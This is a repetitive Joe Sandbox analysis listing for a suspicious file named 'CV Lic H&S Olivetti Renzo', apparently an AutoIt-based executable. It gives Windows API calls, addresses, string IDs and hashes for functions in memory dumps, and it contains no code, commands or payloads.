                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00133973,00000016,0000138C,00000016,?,00000016,0015DDB4,00000000,?), ref: 001026F1
                                                                                            • LoadStringW.USER32(00000000,?,00133973,00000016), ref: 001026FA
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00133973,00000016,0000138C,00000016,?,00000016,0015DDB4,00000000,?,00000016), ref: 0010271C
                                                                                            • LoadStringW.USER32(00000000,?,00133973,00000016), ref: 0010271F
                                                                                            • __swprintf.LIBCMT ref: 0010276F
                                                                                            • __swprintf.LIBCMT ref: 00102780
                                                                                            • _wprintf.LIBCMT ref: 00102829
                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00102840
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                            • API String ID: 618562835-2268648507
                                                                                            • Opcode ID: f48ff45fe32cb54e5ec934b875dbc02d891f48c8f0860361052b70369430b237
                                                                                            • Instruction ID: 676aaa05bd777fc11dde28b90179a320f335c573870afb13ea9467c6c4e90e5e
                                                                                            • Opcode Fuzzy Hash: f48ff45fe32cb54e5ec934b875dbc02d891f48c8f0860361052b70369430b237
                                                                                            • Instruction Fuzzy Hash: EC414A72800218AADB14FBE0DD8AEEEB778AF25340F144069F505760A3EB706F49DB61
                                                                                            APIs
                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0010D0D8
                                                                                            • __swprintf.LIBCMT ref: 0010D0FA
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0010D137
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0010D15C
                                                                                            • _memset.LIBCMT ref: 0010D17B
                                                                                            • _wcsncpy.LIBCMT ref: 0010D1B7
                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0010D1EC
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0010D1F7
                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0010D200
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0010D20A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                            • String ID: :$\$\??\%s
                                                                                            • API String ID: 2733774712-3457252023
                                                                                            • Opcode ID: ac61f48bcc4a9ff3f1c8d95123e21a15393da71bb5cb46146708e0e43a45cb19
                                                                                            • Instruction ID: c44a301f49ce5eb03bb13b9e83ffd80bc1e482771f04c6b9f27c4c0864c7b037
                                                                                            • Opcode Fuzzy Hash: ac61f48bcc4a9ff3f1c8d95123e21a15393da71bb5cb46146708e0e43a45cb19
                                                                                            • Instruction Fuzzy Hash: 073194B6500109ABDB21DFA1EC49FEF77BDEF89740F1040B6F549D21A1EBB096858B24
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0012BEF4,?,?), ref: 0012E754
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E76B
                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E776
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E783
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0012E78C
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E79B
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0012E7A4
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E7AB
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E7BC
                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0014D9BC,?), ref: 0012E7D5
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0012E7E5
                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0012E809
                                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0012E834
                                                                                            • DeleteObject.GDI32(00000000), ref: 0012E85C
                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0012E872
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3840717409-0
                                                                                            • Opcode ID: ea63243b6a240fbbeb8d8a8c9982a47cc5f232a5a23cc2a93d304c5f467177dc
                                                                                            • Instruction ID: 33c8d54d1d8e595ddb413bba2fab36c795439f548cb0c90cf5222ed9232fb77c
                                                                                            • Opcode Fuzzy Hash: ea63243b6a240fbbeb8d8a8c9982a47cc5f232a5a23cc2a93d304c5f467177dc
                                                                                            • Instruction Fuzzy Hash: 83413879600214FFDB119F65EC88EAA7BB8FF8AB15F108058F906D7260D771AD81DB60
                                                                                            APIs
                                                                                            • __wsplitpath.LIBCMT ref: 0011076F
                                                                                            • _wcscat.LIBCMT ref: 00110787
                                                                                            • _wcscat.LIBCMT ref: 00110799
                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001107AE
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 001107C2
                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 001107DA
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 001107F4
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00110806
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                            • String ID: *.*
                                                                                            • API String ID: 34673085-438819550
                                                                                            • Opcode ID: b74a22be78553c1beb8e3c5484567c334c0843354640c8db2bfea3bc2586726b
                                                                                            • Instruction ID: 1edc51c50fed59cdd2aaf27584364faefba249e09ec229bb45fa2a5d14fdab36
                                                                                            • Opcode Fuzzy Hash: b74a22be78553c1beb8e3c5484567c334c0843354640c8db2bfea3bc2586726b
                                                                                            • Instruction Fuzzy Hash: 18816D719043419FCB29DF24C8459AEB3E8AB99304F14883EF889D7251EBB0DDD4CB92
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0012EF3B
                                                                                            • GetFocus.USER32 ref: 0012EF4B
                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 0012EF56
                                                                                            • _memset.LIBCMT ref: 0012F081
                                                                                            • GetMenuItemInfoW.USER32 ref: 0012F0AC
                                                                                            • GetMenuItemCount.USER32(00000000), ref: 0012F0CC
                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0012F0DF
                                                                                            • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0012F113
                                                                                            • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0012F15B
                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0012F193
                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0012F1C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                            • String ID: 0
                                                                                            • API String ID: 1296962147-4108050209
                                                                                            • Opcode ID: 79dd1a2738f69b75e17b36c1a1efd0bce30aaf3a6ccb704606a96f8b8768dc7b
                                                                                            • Instruction ID: d3f4a5cad01768eb9cf50976a9ef63422844cf4711acc8d688b16ff9e6e9fcb4
                                                                                            • Opcode Fuzzy Hash: 79dd1a2738f69b75e17b36c1a1efd0bce30aaf3a6ccb704606a96f8b8768dc7b
                                                                                            • Instruction Fuzzy Hash: 6C819E71204321AFDB10CF14E984AABBBF9FB88314F10453EF99897291D770D966CB92
                                                                                            APIs
                                                                                              • Part of subcall function 000FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000FABD7
                                                                                              • Part of subcall function 000FABBB: GetLastError.KERNEL32(?,000FA69F,?,?,?), ref: 000FABE1
                                                                                              • Part of subcall function 000FABBB: GetProcessHeap.KERNEL32(00000008,?,?,000FA69F,?,?,?), ref: 000FABF0
                                                                                              • Part of subcall function 000FABBB: HeapAlloc.KERNEL32(00000000,?,000FA69F,?,?,?), ref: 000FABF7
                                                                                              • Part of subcall function 000FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000FAC0E
                                                                                              • Part of subcall function 000FAC56: GetProcessHeap.KERNEL32(00000008,000FA6B5,00000000,00000000,?,000FA6B5,?), ref: 000FAC62
                                                                                              • Part of subcall function 000FAC56: HeapAlloc.KERNEL32(00000000,?,000FA6B5,?), ref: 000FAC69
                                                                                              • Part of subcall function 000FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000FA6B5,?), ref: 000FAC7A
                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000FA8CB
                                                                                            • _memset.LIBCMT ref: 000FA8E0
                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000FA8FF
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 000FA910
                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 000FA94D
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000FA969
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 000FA986
                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000FA995
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 000FA99C
                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000FA9BD
                                                                                            • CopySid.ADVAPI32(00000000), ref: 000FA9C4
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000FA9F5
                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000FAA1B
                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000FAA2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                            • String ID:
                                                                                            • API String ID: 3996160137-0
                                                                                            • Opcode ID: bf3b72fc8ee79442dc3cc66bd4a8ac0f36dea1fa5ff3bbbc7263298ad59b2f6e
                                                                                            • Instruction ID: c76529991691f12458577f47976b2fd49d4390919aabcfef79190b5d0f94d0c9
                                                                                            • Opcode Fuzzy Hash: bf3b72fc8ee79442dc3cc66bd4a8ac0f36dea1fa5ff3bbbc7263298ad59b2f6e
                                                                                            • Instruction Fuzzy Hash: AA516CB5A00209AFDF10CF90DC45AFEBBB9FF06300F048129FA19A7691DB359A45DB61
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadString__swprintf_wprintf
                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                            • API String ID: 2889450990-2391861430
                                                                                            • Opcode ID: 6d0700ed27c8aa2e6fd5b66ee99b1945ced175f2db21ac067e31e45ff2da50b3
                                                                                            • Instruction ID: 3aca1b4c51435df198a0e9389f9e2f4079b8c2b8ec6e59f1965e2798fa323f62
                                                                                            • Opcode Fuzzy Hash: 6d0700ed27c8aa2e6fd5b66ee99b1945ced175f2db21ac067e31e45ff2da50b3
                                                                                            • Instruction Fuzzy Hash: D0517D32800149BADB15EBE0DD46EEEBB78AF14300F14416AF505720A2EB716F99DFA1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadString__swprintf_wprintf
                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                            • API String ID: 2889450990-3420473620
                                                                                            • Opcode ID: 3d10af98284349c8818ec0b75eb0a61bc9d6101c97d284988dcb8f712bcfb68b
                                                                                            • Instruction ID: a1b2abff527debacfbc3b805497510028f5efb53e05dbc402be55570f0047c5d
                                                                                            • Opcode Fuzzy Hash: 3d10af98284349c8818ec0b75eb0a61bc9d6101c97d284988dcb8f712bcfb68b
                                                                                            • Instruction Fuzzy Hash: 4B518C32900209BADB15EBE0DD46EEEB778AF14340F144169F509720A3EB706F99DFA1
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 001055D7
                                                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00105664
                                                                                            • GetMenuItemCount.USER32(00181708), ref: 001056ED
                                                                                            • DeleteMenu.USER32(00181708,00000005,00000000,000000F5,?,?), ref: 0010577D
                                                                                            • DeleteMenu.USER32(00181708,00000004,00000000), ref: 00105785
                                                                                            • DeleteMenu.USER32(00181708,00000006,00000000), ref: 0010578D
                                                                                            • DeleteMenu.USER32(00181708,00000003,00000000), ref: 00105795
                                                                                            • GetMenuItemCount.USER32(00181708), ref: 0010579D
                                                                                            • SetMenuItemInfoW.USER32(00181708,00000004,00000000,00000030), ref: 001057D3
                                                                                            • GetCursorPos.USER32(?), ref: 001057DD
                                                                                            • SetForegroundWindow.USER32(00000000), ref: 001057E6
                                                                                            • TrackPopupMenuEx.USER32(00181708,00000000,?,00000000,00000000,00000000), ref: 001057F9
                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00105805
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                            • String ID:
                                                                                            • API String ID: 3993528054-0
                                                                                            • Opcode ID: 824d4abb4cd24d9e4e5a3fe95ce76ab37f9382a5d64e6f17eb57b4fe4a0ed11b
                                                                                            • Instruction ID: 0efa4f5c414693c26d2459bd1d9e301d6d842fb2632c153b558713d9d59eaea7
                                                                                            • Opcode Fuzzy Hash: 824d4abb4cd24d9e4e5a3fe95ce76ab37f9382a5d64e6f17eb57b4fe4a0ed11b
                                                                                            • Instruction Fuzzy Hash: E3711270640609BFEB209B15DC89FABBF6AFB00364F644205F6596A1E1CBF26850DF94
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 000FA1DC
                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000FA211
                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000FA22D
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000FA249
                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000FA273
                                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 000FA29B
                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000FA2A6
                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000FA2AB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                            • API String ID: 1687751970-22481851
                                                                                            • Opcode ID: fe633dff4d697da468dfad208741eabf456d7895082a94e9029be636728d0d97
                                                                                            • Instruction ID: e95eac47d3b84e9768e265b81da25fa60ea9cb5ca725b384862c113811983ae3
                                                                                            • Opcode Fuzzy Hash: fe633dff4d697da468dfad208741eabf456d7895082a94e9029be636728d0d97
                                                                                            • Instruction Fuzzy Hash: DA410476D1022DAADF21EBA4DC85EEDB7B8FF08300F044129F905A31A1EB35AE45DB51
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00122BB5,?,?), ref: 00123C1D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharUpper
                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                            • API String ID: 3964851224-909552448
                                                                                            • Opcode ID: 340db9907a80af9e90b5bb45d690f7187de2bb6ef29b806bd0e3389d15ba9ba4
                                                                                            • Instruction ID: f60c6b2ae7ae7f49b046914a3be871d9801e773a8faccd87430e686aef4057b4
                                                                                            • Opcode Fuzzy Hash: 340db9907a80af9e90b5bb45d690f7187de2bb6ef29b806bd0e3389d15ba9ba4
                                                                                            • Instruction Fuzzy Hash: 8041403011039E8BDF04EF54E951AEA3365EF52340F905459FD692B292EB74AE2ACB60
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001336F4,00000010,?,Bad directive syntax error,0015DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 001025D6
                                                                                            • LoadStringW.USER32(00000000,?,001336F4,00000010), ref: 001025DD
                                                                                            • _wprintf.LIBCMT ref: 00102610
                                                                                            • __swprintf.LIBCMT ref: 00102632
                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001026A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                            • API String ID: 1080873982-4153970271
                                                                                            • Opcode ID: 5fa4f8f56483d3647c59753cecc7cbd49cf810108a93dcb496350b8126071808
                                                                                            • Instruction ID: 83c0c04df434f95c796dafca518dd134503609afb5d4839d41a26083239b3fcb
                                                                                            • Opcode Fuzzy Hash: 5fa4f8f56483d3647c59753cecc7cbd49cf810108a93dcb496350b8126071808
                                                                                            • Instruction Fuzzy Hash: 35216B3180021ABFDF11AF90CC4AFEE7B79BF19304F044459F919660A3EB71AA58DB51
                                                                                            APIs
                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00107B42
                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00107B58
                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00107B69
                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00107B7B
                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00107B8C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
